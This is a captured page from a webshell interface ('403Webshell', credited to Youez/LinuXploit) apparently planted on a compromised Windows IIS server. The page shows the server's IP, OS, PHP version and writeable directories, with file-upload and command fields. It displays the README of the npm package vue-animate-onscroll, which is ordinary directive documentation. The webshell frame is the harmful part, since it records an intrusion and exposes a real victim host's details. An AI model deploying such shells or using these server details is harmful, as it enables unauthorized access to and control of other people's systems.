403Webshell
Server IP : 185.208.173.17  /  Your IP : 87.236.161.98
Web Server : Microsoft-IIS/10.0
System : Windows NT SRV8576125506 10.0 build 26100 (Windows Server 2016) AMD64
User : IUSR ( 0)
PHP Version : 7.4.13
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/parsmega.nuxt/node_modules/vue-animate-onscroll/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/parsmega.nuxt/node_modules/vue-animate-onscroll/README.md
# vue-animate-onscroll
A simple Vue directive that animates elements as they scroll into view.

## Installation

```sh
npm install vue-animate-onscroll
# or
yarn add vue-animate-onscroll
```

## Setup
Import to your `Vue` application
```javascript
import Vue from 'vue'
import VueAnimateOnScroll from 'vue-animate-onscroll'

Vue.use(VueAnimateOnScroll)
```

## Usage
For demo purposes, let's use [animate.css](https://daneden.github.io/animate.css/),
a css animation library but using your own custom CSS animations would work the same way as well.

Import `animate.css` anyway you like. For demo purposes, in your `index.html`
```html
<head>
  <!-- some other stuff -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.5.2/animate.min.css">
</head>
```

Pass the desired class as a string literal (in single quotes) in your `Vue` template:
```html
<div v-animate-onscroll="'animated flip'">Animate me once upon scroll</div>
```

### Repeat Modifier
Note that by default the animation will only trigger once: the first time the element scrolled into view. If you want to repeat the animation everytime it was scrolled into view, use the `repeat` modifier:
```html
<div v-animate-onscroll.repeat="'animated flip'">Animate me upon scroll forever</div>
```

### Scroll Direction
It's also possible to animate only on a specific scroll direction by passing in an object as the value. In the following example, the animation will only trigger the first time you scroll down on the element.

```html
<div v-animate-onscroll="{down: 'animated flip'}">Animate me once upon scroll down</div>
```
On upward scroll:
```html
<div v-animate-onscroll="{up: 'animated rotateOut'}">Animate me once upon scroll up</div>
```

If you want to repeat the animation *everytime you scroll down* to the element add the `repeat` modifier:

```html
<div v-animate-onscroll.repeat="{down: 'animated flip'}">Animate me everytime you scroll down on me</div>
```

### Multiple animations
Or use two different animations for each scroll direction:
```html
<div v-animate-onscroll="{down: 'animated flip', up: 'animated rotateOut' }">Animate me upon scroll forever</div>
```
Note that by providing both `up` and `down` directions, the `repeat` modifier is implicitly in effect.

## Demo
Live demo [here](https://vue-animate-onscroll.netlify.com/).

## License

<a rel="license" href="http://creativecommons.org/licenses/by-sa/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-sa/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" href="http://purl.org/dc/dcmitype/Text" property="dct:title" rel="dct:type">vue-animate-onscroll</span> by <a xmlns:cc="http://creativecommons.org/ns#" href="www.josephharveyangeles.com" property="cc:attributionName" rel="cc:attributionURL">Joseph Harvey Angeles</a> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-sa/4.0/">Creative Commons Attribution-ShareAlike 4.0 International License</a>.<br />Based on a work at <a xmlns:dct="http://purl.org/dc/terms/" href="https://github.com/josephharveyangeles/vue-animate-onscroll" rel="dct:source">https://github.com/josephharveyangeles/vue-animate-onscroll</a>.

Youez - 2016 - github.com/yon3zu
LinuXploit